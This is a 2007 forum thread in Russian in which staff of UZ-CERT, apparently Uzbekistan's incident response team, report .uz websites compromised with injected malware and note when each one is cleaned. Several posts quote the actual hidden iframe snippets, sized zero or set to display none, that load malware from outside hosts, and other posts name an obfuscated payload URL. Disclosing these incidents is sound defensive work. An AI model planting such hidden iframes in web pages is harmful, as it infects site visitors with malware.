|
|
|
|||||||
| Знаете ли Вы, что ... | |
 |
...для каждой темы существует свой раздел. Изучите структуру форума. Если соответствующего раздела нет, то всегда есть раздел "Разное" :) |
| << Предыдущий совет - Случайный совет - Следующий совет >> | |
UZ-CERT Служба реагирования на компьютерные инциденты / Computer Emergency Response Team (cert.uz). Раздел UZINFOCOM 
|
| Закрыто |
|
|
Опции темы | Опции просмотра |
19.09.2007 15:08
|
#1 | |||||||
   Администратор
UZINFOCOM
Заместитель директора
Сообщений: 4,761
+ 430
2,262/1,333
– 13
26/14
  |
Уважаемые пользователи!
В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами. По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса. Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке.
__________________
Вы всё ещё не знаете правил uForum?|Лица uForum'а|Закладки|Как отключить нежелательные разделы|RSS-ленты uForum'а|Статистика uForum'а|Блог uForum.uz|TEL.UZ Последний раз редактировалось Eldar Ishimbaev; 19.09.2007 в 15:11. |
|||||||
|
|
|
19.09.2007 15:29
|
#2 | |||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.
Первая вредоносная ссылка: Код HTML:
<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html> Код HTML:
<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe> update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:28. |
|||||
|
|
|
20.09.2007 14:33
|
#3 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 24.09.2007 в 10:59. |
|||||||
|
|
|
"+" от:
|
|
20.09.2007 14:42
|
#4 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 7 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25. |
|||||||
|
|
|
20.09.2007 14:46
|
#5 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 2 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25. |
|||||||
|
|
|
20.09.2007 14:50
|
#6 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в одном месте файла index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26. |
|||||||
|
|
|
20.09.2007 15:38
|
#7 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.
Первая ссылка: Код:
<iframe src="http://lilohost.hk/cgi/index.php" width="0" height="0"></iframe> Код:
<iframe name=857699b070 src='http://alltraff.ru/lol.php?1003893b72477f' width=761 height=186 style='display: none'></iframe> Последний раз редактировалось Dmitry Paleev; 20.09.2007 в 17:07. |
|||||||
|
|
| Реклама и уведомления | |
|
20.09.2007 15:50
|
#8 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 3 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26. |
|||||||
|
|
|
20.09.2007 15:55
|
#9 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 1 месте в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27. |
|||||||
|
|
|
20.09.2007 15:59
|
#10 | |||||||
Администратор
UZINFOCOM
Ведущий специалист UZ-CERT
Сообщений: 946
+ 180
203/128
– 1
0/0
|
На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 9 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27. |
|||||||
|
|
|
Лента: УГРОЗЫ НА САЙТАХ .UZ
Линейный вид
